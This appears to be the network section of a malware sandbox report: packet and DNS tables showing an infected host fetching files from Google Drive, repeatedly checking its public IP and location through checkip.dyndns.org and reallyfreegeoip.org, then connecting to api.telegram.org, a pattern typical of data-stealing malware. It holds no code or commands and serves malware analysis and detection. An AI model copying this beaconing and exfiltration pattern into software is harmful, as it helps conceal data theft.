                                                                                              Oct 24, 2024 12:03:24.286056042 CEST4917980192.168.2.22193.122.130.0
                                                                                              Oct 24, 2024 12:03:24.293914080 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:24.293956041 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:24.294028044 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:24.294677973 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:24.294689894 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.176686049 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.176753998 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:25.181469917 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:25.181478977 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.181765079 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.184426069 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:25.227330923 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.420994997 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.421169996 CEST44349181149.154.167.220192.168.2.22
                                                                                              Oct 24, 2024 12:03:25.421257019 CEST49181443192.168.2.22149.154.167.220
                                                                                              Oct 24, 2024 12:03:25.422115088 CEST49181443192.168.2.22149.154.167.220
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 24, 2024 12:03:01.934312105 CEST6275153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:01.942065954 CEST53627518.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:03.439872980 CEST5789353192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:03.456600904 CEST53578938.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.703336000 CEST5482153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST53548218.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:08.715497971 CEST5471953192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST53547198.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:09.588920116 CEST4988153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:09.600358009 CEST53498818.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.546086073 CEST5499853192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST53549988.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:11.556241989 CEST5278153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST53527818.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:12.645729065 CEST6392653192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:12.657155991 CEST53639268.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.440778017 CEST6551053192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST53655108.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:13.449851036 CEST6267253192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST53626728.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:14.682558060 CEST5647553192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:14.693219900 CEST53564758.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.780508041 CEST4938453192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST53493848.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:15.792776108 CEST5484253192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST53548428.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:16.667134047 CEST5810553192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:16.674820900 CEST53581058.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.440143108 CEST6492853192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST53649288.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:17.449368954 CEST5739053192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST53573908.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:18.353665113 CEST5809553192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:18.361125946 CEST53580958.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.244083881 CEST5426153192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST53542618.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.253729105 CEST6050753192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST53605078.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:19.926201105 CEST5044653192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:19.934623003 CEST53504468.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:20.711618900 CEST5593953192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST53559398.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.035144091 CEST4960853192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST53496088.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.099776030 CEST4960853192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST53496088.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:21.987838984 CEST6148653192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:21.998722076 CEST53614868.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.774760962 CEST6245353192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:22.783020020 CEST53624538.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:22.787944078 CEST5056853192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:22.794996977 CEST53505688.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:23.466106892 CEST6146753192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:23.478737116 CEST53614678.8.8.8192.168.2.22
                                                                                              Oct 24, 2024 12:03:24.286026001 CEST6161853192.168.2.228.8.8.8
                                                                                              Oct 24, 2024 12:03:24.293239117 CEST53616188.8.8.8192.168.2.22
                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Oct 24, 2024 12:03:01.934312105 CEST192.168.2.228.8.8.80xe1eeStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:03.439872980 CEST192.168.2.228.8.8.80x33d5Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.703336000 CEST192.168.2.228.8.8.80xd756Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.715497971 CEST192.168.2.228.8.8.80x6d04Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:09.588920116 CEST192.168.2.228.8.8.80xf2cStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.546086073 CEST192.168.2.228.8.8.80x410fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.556241989 CEST192.168.2.228.8.8.80x6df2Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:12.645729065 CEST192.168.2.228.8.8.80xa09fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.440778017 CEST192.168.2.228.8.8.80x971fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.449851036 CEST192.168.2.228.8.8.80x9f29Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:14.682558060 CEST192.168.2.228.8.8.80x9e8fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.780508041 CEST192.168.2.228.8.8.80xd6fdStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.792776108 CEST192.168.2.228.8.8.80x8bc7Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:16.667134047 CEST192.168.2.228.8.8.80x8a58Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.440143108 CEST192.168.2.228.8.8.80xbf15Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.449368954 CEST192.168.2.228.8.8.80x1a99Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:18.353665113 CEST192.168.2.228.8.8.80x14ffStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.244083881 CEST192.168.2.228.8.8.80xcc20Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.253729105 CEST192.168.2.228.8.8.80xcb96Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.926201105 CEST192.168.2.228.8.8.80x107eStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.711618900 CEST192.168.2.228.8.8.80x35cbStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.035144091 CEST192.168.2.228.8.8.80xbf82Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099776030 CEST192.168.2.228.8.8.80xbf82Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.987838984 CEST192.168.2.228.8.8.80x5ab7Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.774760962 CEST192.168.2.228.8.8.80x992fStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:22.787944078 CEST192.168.2.228.8.8.80xa66aStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:23.466106892 CEST192.168.2.228.8.8.80xfbfStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:24.286026001 CEST192.168.2.228.8.8.80xa178Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Oct 24, 2024 12:03:01.942065954 CEST8.8.8.8192.168.2.220xe1eeNo error (0)drive.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:03.456600904 CEST8.8.8.8192.168.2.220x33d5No error (0)drive.usercontent.google.com142.250.186.97A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST8.8.8.8192.168.2.220xd756No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST8.8.8.8192.168.2.220xd756No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST8.8.8.8192.168.2.220xd756No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST8.8.8.8192.168.2.220xd756No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST8.8.8.8192.168.2.220xd756No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.711078882 CEST8.8.8.8192.168.2.220xd756No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST8.8.8.8192.168.2.220x6d04No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST8.8.8.8192.168.2.220x6d04No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST8.8.8.8192.168.2.220x6d04No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST8.8.8.8192.168.2.220x6d04No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST8.8.8.8192.168.2.220x6d04No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:08.723803043 CEST8.8.8.8192.168.2.220x6d04No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:09.600358009 CEST8.8.8.8192.168.2.220xf2cNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:09.600358009 CEST8.8.8.8192.168.2.220xf2cNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST8.8.8.8192.168.2.220x410fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST8.8.8.8192.168.2.220x410fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST8.8.8.8192.168.2.220x410fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST8.8.8.8192.168.2.220x410fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST8.8.8.8192.168.2.220x410fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.553348064 CEST8.8.8.8192.168.2.220x410fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST8.8.8.8192.168.2.220x6df2No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST8.8.8.8192.168.2.220x6df2No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST8.8.8.8192.168.2.220x6df2No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST8.8.8.8192.168.2.220x6df2No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST8.8.8.8192.168.2.220x6df2No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:11.563252926 CEST8.8.8.8192.168.2.220x6df2No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:12.657155991 CEST8.8.8.8192.168.2.220xa09fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:12.657155991 CEST8.8.8.8192.168.2.220xa09fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST8.8.8.8192.168.2.220x971fNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST8.8.8.8192.168.2.220x971fNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST8.8.8.8192.168.2.220x971fNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST8.8.8.8192.168.2.220x971fNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST8.8.8.8192.168.2.220x971fNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.447781086 CEST8.8.8.8192.168.2.220x971fNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST8.8.8.8192.168.2.220x9f29No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST8.8.8.8192.168.2.220x9f29No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST8.8.8.8192.168.2.220x9f29No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST8.8.8.8192.168.2.220x9f29No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST8.8.8.8192.168.2.220x9f29No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:13.456893921 CEST8.8.8.8192.168.2.220x9f29No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:14.693219900 CEST8.8.8.8192.168.2.220x9e8fNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:14.693219900 CEST8.8.8.8192.168.2.220x9e8fNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST8.8.8.8192.168.2.220xd6fdNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST8.8.8.8192.168.2.220xd6fdNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST8.8.8.8192.168.2.220xd6fdNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST8.8.8.8192.168.2.220xd6fdNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST8.8.8.8192.168.2.220xd6fdNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.787566900 CEST8.8.8.8192.168.2.220xd6fdNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST8.8.8.8192.168.2.220x8bc7No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST8.8.8.8192.168.2.220x8bc7No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST8.8.8.8192.168.2.220x8bc7No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST8.8.8.8192.168.2.220x8bc7No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST8.8.8.8192.168.2.220x8bc7No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:15.799765110 CEST8.8.8.8192.168.2.220x8bc7No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:16.674820900 CEST8.8.8.8192.168.2.220x8a58No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:16.674820900 CEST8.8.8.8192.168.2.220x8a58No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST8.8.8.8192.168.2.220xbf15No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST8.8.8.8192.168.2.220xbf15No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST8.8.8.8192.168.2.220xbf15No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST8.8.8.8192.168.2.220xbf15No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST8.8.8.8192.168.2.220xbf15No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.447386980 CEST8.8.8.8192.168.2.220xbf15No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST8.8.8.8192.168.2.220x1a99No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST8.8.8.8192.168.2.220x1a99No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST8.8.8.8192.168.2.220x1a99No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST8.8.8.8192.168.2.220x1a99No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST8.8.8.8192.168.2.220x1a99No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:17.456434965 CEST8.8.8.8192.168.2.220x1a99No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:18.361125946 CEST8.8.8.8192.168.2.220x14ffNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:18.361125946 CEST8.8.8.8192.168.2.220x14ffNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST8.8.8.8192.168.2.220xcc20No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST8.8.8.8192.168.2.220xcc20No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST8.8.8.8192.168.2.220xcc20No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST8.8.8.8192.168.2.220xcc20No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST8.8.8.8192.168.2.220xcc20No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.251288891 CEST8.8.8.8192.168.2.220xcc20No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST8.8.8.8192.168.2.220xcb96No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST8.8.8.8192.168.2.220xcb96No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST8.8.8.8192.168.2.220xcb96No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST8.8.8.8192.168.2.220xcb96No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST8.8.8.8192.168.2.220xcb96No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.260782957 CEST8.8.8.8192.168.2.220xcb96No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.934623003 CEST8.8.8.8192.168.2.220x107eNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:19.934623003 CEST8.8.8.8192.168.2.220x107eNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST8.8.8.8192.168.2.220x35cbNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST8.8.8.8192.168.2.220x35cbNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST8.8.8.8192.168.2.220x35cbNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST8.8.8.8192.168.2.220x35cbNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST8.8.8.8192.168.2.220x35cbNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:20.718589067 CEST8.8.8.8192.168.2.220x35cbNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.099534988 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.109612942 CEST8.8.8.8192.168.2.220xbf82No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.998722076 CEST8.8.8.8192.168.2.220x5ab7No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                                                                              Oct 24, 2024 12:03:21.998722076 CEST8.8.8.8192.168.2.220x5ab7No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
